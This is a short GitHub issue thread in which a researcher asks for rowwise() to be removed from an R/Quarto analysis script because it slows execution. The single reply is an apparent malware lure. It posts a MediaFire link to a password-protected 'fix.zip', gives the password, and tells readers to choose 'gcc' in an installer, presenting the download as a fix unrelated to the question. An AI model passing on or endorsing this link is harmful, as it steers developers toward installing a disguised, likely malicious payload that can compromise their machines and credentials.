### ISSUE TITLE
Remove rowwise() 

### ISSUE THREAD

**Issue by rpsychologist** [digital-wellbeing/platform-study-rr#13]
I don't think rowwise() is needed here, and it makes the code run much slower
https://github.com/digital-wellbeing/platform-study-rr/blob/4993ebebf2395edd8f87b2272cbf0fcec2a53b47/4_genres.qmd#L277

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
